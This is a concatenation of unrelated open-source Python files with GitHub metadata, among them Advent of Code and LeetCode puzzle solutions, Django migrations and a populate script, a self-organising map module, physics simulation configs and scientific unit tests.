for idy, field in enumerate(passports[idx]):
before_colon = re.compile(r"^[^:]+:")
[requirement] = before_colon.findall(field)
passports[idx][idy] = requirement[:-1]
for txt_block in passports:
if (sorted(txt_block) == sorted(req)) or (sorted(txt_block) == sorted(reqc)):
counter += 1
return counter
if __name__ == "__main__":
print(solve(input))
|
[
"LilySu@users.noreply.github.com"
] |
LilySu@users.noreply.github.com
|
fd4b9bbad032fd93f0ca1ccbfe850ab51f7e941f
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_2/babpls/pancake.py
|
d28c2b437d135f52472fcf97a0e7317ca7ed9438
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 324
|
py
|
fin = open('pancake.in', 'r')
fout = open('pancake.out', 'w')
count = 0
for line in fin:
if count != 0:
out = 0
cur = '+'
for x in line[:-1][::-1]:
if cur != x:
cur = x
out += 1
fout.write('Case #%d: %s\n' % (count, str(out)))
count += 1
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
ca694b19b1ddaa3393d91190f4addb316c5fd96e
|
8240abd177ece3a1cf2d753cc5694c1fec478709
|
/week1/codeingBat/list-2/04.py
|
def4b4029205be7d5c428af84f9eba1616343dda
|
[] |
no_license
|
DastanB/BF-Django
|
255001185d8a8318bd19b750fe662a7f86b64d92
|
adcd1d968b94ea5097fd3d03338f031d5497d463
|
refs/heads/master
| 2022-10-27T06:44:56.648527
| 2018-11-24T18:33:35
| 2018-11-24T18:33:35
| 147,125,321
| 1
| 1
| null | 2022-10-19T08:22:54
| 2018-09-02T22:07:22
|
Python
|
UTF-8
|
Python
| false
| false
| 242
|
py
|
def sum13(nums):
sum = 0
for i in range (len(nums)):
if nums[i] != 13:
sum += nums[i]
elif nums[i] == 13 and i < len(nums)-1:
nums[i]=0;
nums[i+1] =0
return sum
|
[
"dastan211298@gmail.com"
] |
dastan211298@gmail.com
|
96b80fdd8c80d38fff3348a20ed3e1d9e961fbd0
|
7356f77784c9ad3ffb3da4b3b60d844b23bb7b29
|
/dt_automator/maker/model/scene.py
|
3af1bfa5266ca3679ea24f3ea9652d3b6e46778b
|
[] |
no_license
|
HsOjo/DTAutomator
|
5cc513e41a3eba0a595bb410bcee6ff990140805
|
d51c31ea04a79ed767f661ab0f9599b1c0f0bcef
|
refs/heads/master
| 2021-02-13T00:59:06.424434
| 2020-05-03T04:34:12
| 2020-05-03T04:34:12
| 244,647,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 669
|
py
|
from typing import List
from dt_automator.base.model import BaseModel
from .feature import FeatureModel
from .object import ObjectModel
class SceneModel(BaseModel):
_sub_model = dict(
features=(list, FeatureModel),
objects=(list, ObjectModel),
)
def __init__(self, event: dict):
self._event = event
self.name = ''
self.img = ''
self.features = [] # type: List[FeatureModel]
self.objects = [] # type: List[ObjectModel]
@property
def img_path(self):
return self._event['get_path'](self.img)
def __repr__(self):
return '<%s %s>' % (self.__class__.__name__, self.name)
|
[
"1134031392@qq.com"
] |
1134031392@qq.com
|
fbb829ca8e1fb3c025af62444ebef149db9b56ce
|
07996c7f93e7b200146cd314520100cf99d003bd
|
/raw data/40_tos_with_paragraph/code/crawlParagraph/new-env/bin/conch
|
4090c800e7522412274480e3f813286e46384855
|
[] |
no_license
|
tjuyanghw/data_policy_analyzer
|
31ae683128ca5241fa8f0cb67e2f1132820c2d02
|
010a44ff024bd6d97b21f409f6c62f969e1fdc55
|
refs/heads/master
| 2022-07-02T19:23:14.141170
| 2020-05-13T16:24:11
| 2020-05-13T16:24:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
#!/Users/huthvincent/Desktop/scrapy/scrapyenv/crawlByOnce/new-env/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'Twisted==19.10.0','console_scripts','conch'
__requires__ = 'Twisted==19.10.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('Twisted==19.10.0', 'console_scripts', 'conch')()
)
|
[
"xiaoyue10131748@gmail.com"
] |
xiaoyue10131748@gmail.com
|
|
1f2e7b1fdb24d899b19051ed50eaeaf5aeeb8f4e
|
b3fd61fdfd6ea82695d805c95321619423b836e6
|
/Tom_Sawyer.py
|
02e8482d4f8b2e35842c340ef85ed059753499c5
|
[] |
no_license
|
sjogleka/General_codes
|
761967fd1175c97804d49290af9db10828d4900f
|
2772ea7b723c4ca680864b40b41fd34cc197726d
|
refs/heads/master
| 2021-07-16T07:41:05.841942
| 2020-10-14T01:49:12
| 2020-10-14T01:49:12
| 218,369,391
| 7
| 8
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 312
|
py
|
def countWays(arr, n):
pos = [0 for i in range(n)]
p = 0
for i in range(n):
if (arr[i] == 1):
pos[p] = i + 1
p += 1
if (p == 0):
return 0
ways = 1
for i in range(p - 1):
ways *= pos[i + 1] - pos[i]
return ways
print(countWays([0,1],2))
|
[
"sjogleka@uncc.edu"
] |
sjogleka@uncc.edu
|
9e6e89a22d2678d31373d33e7f817a66b671619b
|
dcc491dd2fa4ece68728255d236fa6e784eef92d
|
/modules/2.78/bpy/ops/outliner.py
|
0825988f0ade8aa85899d877be01bb396b376431
|
[
"MIT"
] |
permissive
|
cmbasnett/fake-bpy-module
|
a8e87d5a95d075e51133307dfb55418b94342f4f
|
acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55
|
refs/heads/master
| 2020-03-14T16:06:29.132956
| 2018-05-13T01:29:55
| 2018-05-13T01:29:55
| 131,691,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,671
|
py
|
def action_set(action=''):
pass
def animdata_operation(type='CLEAR_ANIMDATA'):
pass
def constraint_operation(type='ENABLE'):
pass
def data_operation(type='SELECT'):
pass
def drivers_add_selected():
pass
def drivers_delete_selected():
pass
def expanded_toggle():
pass
def group_link(object="Object"):
pass
def group_operation(type='UNLINK'):
pass
def id_delete():
pass
def id_operation(type='UNLINK'):
pass
def id_remap(id_type='OBJECT', old_id='', new_id=''):
pass
def item_activate(extend=True, recursive=False):
pass
def item_openclose(all=True):
pass
def item_rename():
pass
def keyingset_add_selected():
pass
def keyingset_remove_selected():
pass
def lib_operation(type='RENAME'):
pass
def lib_relocate():
pass
def material_drop(object="Object", material="Material"):
pass
def modifier_operation(type='TOGVIS'):
pass
def object_operation(type='SELECT'):
pass
def operation():
pass
def orphans_purge():
pass
def parent_clear(dragged_obj="Object", type='CLEAR'):
pass
def parent_drop(child="Object", parent="Object", type='OBJECT'):
pass
def renderability_toggle():
pass
def scene_drop(object="Object", scene="Scene"):
pass
def scene_operation(type='DELETE'):
pass
def scroll_page(up=False):
pass
def select_border(gesture_mode=0, xmin=0, xmax=0, ymin=0, ymax=0):
pass
def selectability_toggle():
pass
def selected_toggle():
pass
def show_active():
pass
def show_hierarchy():
pass
def show_one_level(open=True):
pass
def visibility_toggle():
pass
|
[
"nutti.metro@gmail.com"
] |
nutti.metro@gmail.com
|
6daa0f6ca0ec15a3661dc69769cc530be5110fb4
|
ecbc312f6c5733a4c8ebcc9c3fccdba8bc35fd2f
|
/text_normalizer/collection/eng_basic.py
|
0432800ebf5e9c3e77fbc5fa67ff71ed84217fbd
|
[
"MIT"
] |
permissive
|
Yoctol/text-normalizer
|
d200a4e020618e70162cbc52a3099d9a9203aab9
|
3609c10cd229c08b4623531e82d2292fc370734c
|
refs/heads/master
| 2020-03-11T00:56:25.337539
| 2018-11-06T04:08:37
| 2018-11-06T04:08:37
| 129,676,388
| 17
| 3
|
MIT
| 2018-11-06T04:08:38
| 2018-04-16T02:57:34
|
Python
|
UTF-8
|
Python
| false
| false
| 439
|
py
|
from .base_collection import BaseCollection
from ..library import (
whitespace_char_text_normalizer,
pure_strip_text_normalizer,
eng_lowercase_text_normalizer,
)
eng_basic_text_normalizer_collection = BaseCollection()
eng_basic_text_normalizer_collection.add_text_normalizers(
text_normalizers=[
eng_lowercase_text_normalizer,
whitespace_char_text_normalizer,
pure_strip_text_normalizer,
],
)
|
[
"s916526000@gmail.com"
] |
s916526000@gmail.com
|
211dc4152498ce7967b1fc4828f9e7be31a98caf
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/_algorithms_challenges/leetcode/LeetCode_with_solution/096_Unique_Binary_Search_Trees.py
|
6b846c2a2a8141cdb599d93d5826000dc142e497
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 419
|
py
|
c_ Solution o..
___ numTrees n
"""
:type n: int
:rtype: int
"""
# https://leetcode.com/discuss/86650/fantastic-clean-java-dp-solution-with-detail-explaination
dp = [0] * (n + 1)
dp[0] = 1
dp[1] = 1
___ level __ r.. 2, n + 1
___ root __ r.. 1, level + 1
dp[level] += dp[level - root] * dp[root - 1]
r_ dp[n]
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
403157814d970ad27e47a62924b88c665308ac35
|
a1b375c3e98fe059dafc4d74cbcbcb99a0571e44
|
/accounts/migrations/0001_initial.py
|
ffea45cf723bf87cb80e5a6a39898021cf2970d0
|
[
"MIT"
] |
permissive
|
mohsenamoon1160417237/Social_app
|
478a73552ceed8001c167be6caaf550cd58626bd
|
79fa0871f7b83648894941f9010f1d99f1b27ab3
|
refs/heads/master
| 2022-12-09T16:03:53.623506
| 2020-09-21T05:59:22
| 2020-09-21T06:02:03
| 297,242,915
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 833
|
py
|
# Generated by Django 2.2 on 2020-09-10 17:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=50)),
('last_name', models.CharField(max_length=50)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"dramatic225@gmail.com"
] |
dramatic225@gmail.com
|
e6a83c518c0ad5a0e277d860ea3388efff7b2f63
|
44a7330dfa4fe321eb432ee57a32328578dec109
|
/milk/unsupervised/som.py
|
abe3f6dbe5b47773ecfa3cb5f58852d2d220e17f
|
[
"MIT"
] |
permissive
|
tzuryby/milk
|
7cb6760fad600e9e0d0c9216dc749db289b596fb
|
a7159b748414d4d095741978fb994c4affcf6b9b
|
refs/heads/master
| 2020-12-29T02:45:33.044864
| 2011-03-15T20:23:29
| 2011-03-15T20:25:11
| 1,485,748
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,261
|
py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2010, Luis Pedro Coelho <lpc@cmu.edu>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
# License: MIT. See COPYING.MIT file in the milk distribution
from __future__ import division
import numpy as np
from ..utils import get_pyrandom
from . import _som
def putpoints(grid, points, L=.2, radius=4, iterations=1, shuffle=True, R=None):
'''
putpoints(grid, points, L=.2, radius=4, iterations=1, shuffle=True, R=None)
Feeds elements of `points` into the SOM `grid`
Parameters
----------
grid : ndarray
Self organising map
points : ndarray
data to feed to array
L : float, optional
How much to influence neighbouring points (default: .2)
radius : integer, optional
Maximum radius of influence (in L_1 distance, default: 4)
iterations : integer, optional
Number of iterations
shuffle : boolean, optional
Whether to shuffle the points before each iterations
R : source of randomness
'''
if radius is None:
radius = 4
if type(L) != float:
raise TypeError("milk.unsupervised.som: L should be floating point")
if type(radius) != int:
raise TypeError("milk.unsupervised.som: radius should be an integer")
if grid.dtype != np.float32:
raise TypeError('milk.unsupervised.som: only float32 arrays are accepted')
if points.dtype != np.float32:
raise TypeError('milk.unsupervised.som: only float32 arrays are accepted')
if len(grid.shape) == 2:
grid = grid.reshape(grid.shape+(1,))
if shuffle:
random = get_pyrandom(R)
for i in xrange(iterations):
if shuffle:
random.shuffle(points)
_som.putpoints(grid, points, L, radius)
def closest(grid, f):
'''
y,x = closest(grid, f)
Finds the coordinates of the closest point in the `grid` to `f`
::
y,x = \\argmin_{y,x} { || grid[y,x] - f ||^2 }
Parameters
----------
grid : ndarray of shape Y,X,J
self-organised map
f : ndarray of shape J
point
Returns
-------
y,x : integers
coordinates into `grid`
'''
delta = grid - f
delta **= 2
delta = delta.sum(2)
return np.unravel_index(delta.argmin(), delta.shape)
def som(data, shape, iterations=1000, L=.2, radius=4, R=None):
'''
grid = som(data, shape, iterations=1000, L=.2, radius=4, R=None):
Self-organising maps
Parameters
----------
points : ndarray
data to feed to array
shape : tuple
Desired shape of output. Must be 2-dimensional.
L : float, optional
How much to influence neighbouring points (default: .2)
radius : integer, optional
Maximum radius of influence (in L_1 distance, default: 4)
iterations : integer, optional
Number of iterations
R : source of randomness
Returns
-------
grid : ndarray
Map
'''
R = get_pyrandom(R)
d = data.shape[1]
if data.dtype != np.float32:
data = data.astype(np.float32)
grid = np.array(R.sample(data, np.product(shape))).reshape(shape + (d,))
putpoints(grid, data, L=L, radius=radius, iterations=iterations, shuffle=True, R=R)
return grid
|
[
"lpc@cmu.edu"
] |
lpc@cmu.edu
|
54f59acba3e28e9e73601f99667ca553cc1f9529
|
738b6d6ec4572f5848940b6adc58907a03bda6fb
|
/tests/nutmeg4_pymcell4/0625_prob_changed_notification_disabled/model.py
|
bb49dac21464576f72e6b5d1f13578c087a464db
|
[
"Unlicense",
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
mcellteam/mcell_tests
|
09cd1010a356e0e07c88d7e044a73c5606c6e51a
|
34d2d967b75d56edbae999bf0090641850f4f4fe
|
refs/heads/master
| 2021-12-24T02:36:24.987085
| 2021-09-24T14:19:41
| 2021-09-24T14:19:41
| 174,733,926
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,015
|
py
|
#!/usr/bin/env python3
import sys
import os
MCELL_PATH = os.environ.get('MCELL_PATH', '')
if MCELL_PATH:
sys.path.append(os.path.join(MCELL_PATH, 'lib'))
else:
print("Error: variable MCELL_PATH that is used to find the mcell library was not set.")
sys.exit(1)
import mcell as m
params = m.bngl_utils.load_bngl_parameters('test.bngl')
ITERATIONS = int(params['ITERATIONS'])
DUMP = True
EXPORT_DATA_MODEL = True
# ---- load bngl file ----
model = m.Model()
model.load_bngl('test.bngl')
rxn = model.find_reaction_rule('rxn')
assert(rxn)
var_rate_react_a_plus_b = [
[0, 0],
[1e-05, 9.98334e+06],
[2e-05, 1.98669e+07],
[3e-05, 2.9552e+07],
[4e-05, 3.89418e+07],
[5e-05, 4.79426e+07],
[6e-05, 5.64642e+07]
]
rxn.variable_rate = var_rate_react_a_plus_b
# ---- configuration ----
model.config.total_iterations = ITERATIONS
model.notifications.rxn_probability_changed = False
model.initialize()
#model.dump_internal_state()
model.run_iterations(ITERATIONS)
model.end_simulation()
|
[
"ahusar@salk.edu"
] |
ahusar@salk.edu
|
8bde1e7c8d3f15fa84f32773e315e26557bde33f
|
6c816f19d7f4a3d89abbb00eeaf43dd818ecc34f
|
/apps/detailQuestion/migrations/0001_initial.py
|
f55e7aa24232e3c288aacd4cef66e2d65e699b32
|
[] |
no_license
|
reo-dev/bolt
|
29ee6aa7cfc96bd50fa7a7dae07fbaafc2125e54
|
d1a7859dd1ebe2f5b0e6e295047b620f5afdb92e
|
refs/heads/master
| 2023-07-13T04:05:57.856278
| 2021-08-27T09:07:03
| 2021-08-27T09:07:03
| 382,195,547
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,297
|
py
|
# Generated by Django 3.0.8 on 2021-01-12 02:20
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('project', '0013_proposaltype_name'),
]
operations = [
migrations.CreateModel(
name='DetailQuestionTitle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.TextField(verbose_name='질문제목')),
('createdAt', models.DateTimeField(default=django.utils.timezone.now, verbose_name='작성일')),
],
options={
'verbose_name': ' 질문제목',
'verbose_name_plural': ' 질문제목',
},
),
migrations.CreateModel(
name='DetailQuestionSelect',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('select', models.TextField(verbose_name='질문 선택지')),
('createdAt', models.DateTimeField(default=django.utils.timezone.now, verbose_name='작성일')),
('title', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='detailQuestion.DetailQuestionTitle', verbose_name='질문제목')),
],
),
migrations.CreateModel(
name='DetailQuestionSave',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('createdAt', models.DateTimeField(default=django.utils.timezone.now, verbose_name='작성일')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='detailQuestion.DetailQuestionTitle', verbose_name='질문제목')),
('request', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='project.Request', verbose_name='의뢰서')),
('select', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='detailQuestion.DetailQuestionSelect', verbose_name='질문 선택지')),
],
),
]
|
[
"75593016+reo-dev@users.noreply.github.com"
] |
75593016+reo-dev@users.noreply.github.com
|
a88524be820b8141ba2700ef02283fe69fe301c4
|
39bc55c2a4457bbe7ff4136ea660a29ff88ee66d
|
/skued/simulation/tests/test_structure_factors.py
|
7513665650da42ed29e663bb4456ea09438f61dd
|
[
"MIT"
] |
permissive
|
KOLANICH-physics/scikit-ued
|
c72b3219e547e33ae067c5d36a93439d2f9045e2
|
c13472129df33105312b57427ce588e66d20391f
|
refs/heads/master
| 2022-01-22T05:47:04.286449
| 2018-09-24T15:06:00
| 2018-09-24T15:06:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,918
|
py
|
# -*- coding: utf-8 -*-
import unittest
import numpy as np
from random import randint
from .. import structure_factor, bounded_reflections, affe
from ... import Crystal, Atom
class TestElectronFormFactor(unittest.TestCase):
def test_side_effects(self):
nG = np.random.random(size = (16, 32))
nG.setflags(write = False) # if nG is written to, Exception is raised
affe(Atom('He', coords = [0,0,0]), nG)
def test_out_shape(self):
nG = np.random.random(size = (16, 32))
eff = affe(Atom('He', coords = [0,0,0]), nG)
self.assertSequenceEqual(eff.shape, nG.shape)
def test_int(self):
""" Test that affe(int, ...) also works """
atomic_number = randint(1, 103)
nG = np.random.random(size = (16, 32))
from_int = affe(atomic_number, nG)
from_atom = affe(Atom(atomic_number, [0,0,0]), nG)
self.assertTrue(np.allclose(from_int, from_atom))
def test_str(self):
""" Test that affe(str, ...) also works """
# Try with Chlorine (Z = 17)
atomic_number = 17
nG = np.random.random(size = (16, 32))
from_int = affe(atomic_number, nG)
from_str = affe('Cl', nG)
self.assertTrue(np.allclose(from_int, from_str))
class TestStructureFactor(unittest.TestCase):
def setUp(self):
self.crystal = Crystal.from_database(next(iter(Crystal.builtins)))
def test_shape_and_dtype(self):
""" Test that output of structure_factor is same shape as input,
and that the dtype is complex """
h, k, l = np.meshgrid([1, 2, 3], [1, 2, 3], [1, 2, 3])
sf = structure_factor(self.crystal, h, k, l)
self.assertSequenceEqual(sf.shape, h.shape)
self.assertEqual(sf.dtype, np.complex)
class TestBoundedReflections(unittest.TestCase):
def setUp(self):
self.crystal = Crystal.from_database(next(iter(Crystal.builtins)))
def test_bounded_reflections_negative(self):
""" Test that negative reflection bounds raise an Exception.
Otherwise, an infinite number of reflections will be generated """
with self.assertRaises(ValueError):
hkl = list(bounded_reflections(self.crystal, -1))
def test_bounded_reflections_zero(self):
""" Check that bounded_reflections returns (000) for a zero bound """
h, k, l = bounded_reflections(self.crystal,0)
[self.assertEqual(len(i), 1) for i in (h, k, l)]
[self.assertEqual(i[0], 0) for i in (h, k, l)]
def test_bounded_reflections_all_within_bounds(self):
""" Check that every reflection is within the bound """
bound = 10
Gx, Gy, Gz = self.crystal.scattering_vector(*bounded_reflections(self.crystal,nG = bound))
norm_G = np.sqrt(Gx**2 + Gy**2 + Gz**2)
self.assertTrue(np.all(norm_G <= bound))
if __name__ == '__main__':
unittest.main()
|
[
"laurent.decotret@outlook.com"
] |
laurent.decotret@outlook.com
|
de4798e70d7c9c101c756128701b3dde305bd873
|
006ff11fd8cfd5406c6f4318f1bafa1542095f2a
|
/Validation/CheckOverlap/test/python/runFP420_cfg.py
|
bb8cd03847118c55541afbb0a89d58fb4eb5fa73
|
[] |
permissive
|
amkalsi/cmssw
|
8ac5f481c7d7263741b5015381473811c59ac3b1
|
ad0f69098dfbe449ca0570fbcf6fcebd6acc1154
|
refs/heads/CMSSW_7_4_X
| 2021-01-19T16:18:22.857382
| 2016-08-09T16:40:50
| 2016-08-09T16:40:50
| 262,608,661
| 0
| 0
|
Apache-2.0
| 2020-05-09T16:10:07
| 2020-05-09T16:10:07
| null |
UTF-8
|
Python
| false
| false
| 2,204
|
py
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("PROD")
process.load("SimGeneral.HepPDTESSource.pdt_cfi")
process.load("Geometry.CMSCommonData.cmsAllGeometryXML_cfi")
process.load("Geometry.TrackerNumberingBuilder.trackerNumberingGeometry_cfi")
process.load("Geometry.MuonNumbering.muonNumberingInitialization_cfi")
process.load("SimG4Core.Application.g4SimHits_cfi")
process.MessageLogger = cms.Service("MessageLogger",
destinations = cms.untracked.vstring('cout'),
categories = cms.untracked.vstring('G4cout', 'G4cerr'),
cout = cms.untracked.PSet(
default = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
G4cout = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
),
G4cerr = cms.untracked.PSet(
limit = cms.untracked.int32(-1)
)
),
)
process.RandomNumberGeneratorService = cms.Service("RandomNumberGeneratorService",
moduleSeeds = cms.PSet(
generator = cms.untracked.uint32(456789),
g4SimHits = cms.untracked.uint32(9876),
VtxSmeared = cms.untracked.uint32(12345)
),
sourceSeed = cms.untracked.uint32(98765)
)
process.source = cms.Source("EmptySource")
process.generator = cms.EDProducer("FlatRandomEGunProducer",
PGunParameters = cms.PSet(
PartID = cms.vint32(14),
MinEta = cms.double(-3.5),
MaxEta = cms.double(3.5),
MinPhi = cms.double(-3.14159265359),
MaxPhi = cms.double(3.14159265359),
MinE = cms.double(9.99),
MaxE = cms.double(10.01)
),
AddAntiParticle = cms.bool(False),
Verbosity = cms.untracked.int32(0),
firstRun = cms.untracked.uint32(1)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.p1 = cms.Path(process.generator*process.g4SimHits)
process.g4SimHits.UseMagneticField = False
process.g4SimHits.Physics.type = 'SimG4Core/Physics/DummyPhysics'
process.g4SimHits.Physics.DummyEMPhysics = True
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
type = cms.string('CheckOverlap'),
Resolution = cms.untracked.int32(1000),
NodeNames = cms.untracked.vstring('FP420E')
))
|
[
"giulio.eulisse@gmail.com"
] |
giulio.eulisse@gmail.com
|
442bf86ccac1d097b67f928e10a2d28a7d1a246a
|
390a9771799a8264b3c0c8c61cc7e1bf97ef2d79
|
/day23.py
|
ee7b0c961b026c7a9198fb1b34e91d632c061fa0
|
[] |
no_license
|
Goldenlion5648/AdventOfCode2017
|
2bbf96d03017eceaac1279413dc3387359d03a6f
|
482f2c0d5eba49a29c4631ea131753945cfe3baa
|
refs/heads/master
| 2022-12-12T06:20:41.812048
| 2020-09-19T05:08:35
| 2020-09-19T05:08:35
| 289,359,883
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,833
|
py
|
from collections import Counter
a='''set b 99
set c b
jnz a 2
jnz 1 5
mul b 100
sub b -100000
set c b
sub c -17000
set f 1
set d 2
set e 2
set g d
mul g e
sub g b
jnz g 2
set f 0
sub e -1
set g e
sub g b
jnz g -8
sub d -1
set g d
sub g b
jnz g -13
jnz f 2
sub h -1
set g b
sub g c
jnz g 2
jnz 1 3
sub b -17
jnz 1 -23'''
positions = Counter([chr(i) for i in range(97, 97 + 8)])
for i in positions:
positions[i] -= 1
print(positions)
instructs = a.split("\n")
curInstruct = 0
# for i in instructs:
count = 0
while curInstruct < len(instructs):
i = instructs[curInstruct]
inst, b, c = i.split(" ")
jumped = False
try:
b = int(b)
except:
pass
try:
c = int(c)
except:
pass
if inst == "set":
if type(b) == type(2):
positions[chr(b)+97] = c if type(c) == type(3) else positions[c]
else:
positions[b] = c if type(c) == type(3) else positions[c]
elif inst == "sub":
if type(b) == type(2):
positions[chr(b)+97] -= c if type(c) == type(3) else positions[c]
else:
positions[b] -= c if type(c) == type(3) else positions[c]
elif inst == "mul":
if type(b) == type(2):
positions[chr(b)+97] *= c if type(c) == type(3) else positions[c]
else:
positions[b] *= c if type(c) == type(3) else positions[c]
count += 1
elif inst == "jnz":
if type(b) == type(2):
if b != 0:
curInstruct += c if type(c) == type(3) else positions[c]
jumped = True
else:
if positions[b] != 0:
curInstruct += c if type(c) == type(3) else positions[c]
jumped = True
if jumped == False:
curInstruct += 1
print(count)
#part 1 done in 16:57, worked first try
|
[
"coboudinot@gmail.com"
] |
coboudinot@gmail.com
|
88917a546cf6b78403ff35ece587c512e0f076ee
|
622a338ee1f856e542e14757b761546aa4267604
|
/confu/isa.py
|
ddfa5a58dfcb9268fd62c9b758090d785344f16b
|
[
"MIT"
] |
permissive
|
Maratyszcza/confu
|
ad8f30998d6d6ed4b37b72b6d63b7fd8ba549f1d
|
4f3d0e73d20dbae54c154817d70f74b6a63940e1
|
refs/heads/master
| 2023-06-05T15:49:05.476642
| 2020-04-12T20:00:19
| 2020-04-12T20:14:52
| 79,974,006
| 14
| 14
|
MIT
| 2020-01-06T22:34:03
| 2017-01-25T01:55:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
from copy import copy
class InstructionSet:
def __init__(self, tags=None, generate_flags_fn=None):
if tags is None:
self.tags = set()
elif isinstance(tags, str):
self.tags = set((tags,))
else:
self.tags = set(tags)
self.generate_flags = generate_flags_fn
def get_flags(self, compiler):
if self.generate_flags is not None:
return self.generate_flags(self.tags, compiler)
else:
return list()
def __str__(self):
return self.name
def __add__(self, instruction_set):
if not isinstance(instruction_set, InstructionSet):
raise TypeError("Invalid instruction set type; InstructionSet expected")
if self.generate_flags is not None and self.generate_flags is not instruction_set.generate_flags:
raise ValueError("Instruction sets %s and %s are mutually incompatible" %
(self.tags[-1], instruction_set.tags[0]))
return InstructionSet(self.tags.union(instruction_set.tags), self.generate_flags)
|
[
"maratek@gmail.com"
] |
maratek@gmail.com
|
5247e05fedc3b4010c1fd05918da47a596108f5a
|
0b480b28455d4ea133eaeec5625e2ce62660dbb1
|
/populate_rango.py
|
c872d3fa71f07dc547fc08034fa6175d00d97eca
|
[] |
no_license
|
jtr109/tango_with_django_exercise
|
8ff6c05321be8ca614a550abc6c66aef55886136
|
ce2aa7c5a12eae0352b435dc726bef4e378ef3c5
|
refs/heads/master
| 2020-09-22T09:28:34.217081
| 2016-08-30T02:49:35
| 2016-08-30T02:49:35
| 66,900,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,374
|
py
|
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tango_with_django_project.settings')
import django
django.setup()
from rango.models import Category, Page
def populate():
python_cat = add_cat(name='Python',
views=128, likes=64)
add_page(cat=python_cat,
title="Official Python Tutorial",
url="http://docs.python.org/2/tutorial/",
views=16)
add_page(cat=python_cat,
title="How to Think like a Computer Scientist",
url="http://www.greenteapress.com/thinkpython/",
views=32)
add_page(cat=python_cat,
title="Learn Python in 10 Minutes",
url="http://www.korokithakis.net/tutorials/python/",
views=64)
django_cat = add_cat(name="Django",
views=64, likes=32)
add_page(cat=django_cat,
title="Official Django Tutorial",
url="https://docs.djangoproject.com/en/1.5/intro/tutorial01/",
views=128)
add_page(cat=django_cat,
title="Django Rocks",
url="http://www.djangorocks.com/",
views=256)
add_page(cat=django_cat,
title="How to Tango with Django",
url="http://www.tangowithdjango.com/",
views=512)
frame_cat = add_cat(name="Other Frameworks",
views=32, likes=16)
add_page(cat=frame_cat,
title="Bottle",
url="http://bottlepy.org/docs/dev/",
views=400)
add_page(cat=frame_cat,
title="Flask",
url="http://flask.pocoo.org",
views=300)
# Print out what we have added to the user.
for c in Category.objects.all():
for p in Page.objects.filter(category=c):
print "- {0} - {1}".format(str(c), str(p))
def add_page(cat, title, url, views=0):
p = Page.objects.get_or_create(category=cat, title=title)[0]
p.url = url
p.views = views
p.save()
return p
def add_cat(name, views, likes):
# The get_or_create() method returns a tuple of (object, created).
c = Category.objects.get_or_create(name=name)[0]
c.views = views
c.likes = likes
c.save()
return c
# Start execution here!
if __name__ == '__main__':
print "Starting Rango population script..."
populate()
|
[
"lyp_login@outlook.com"
] |
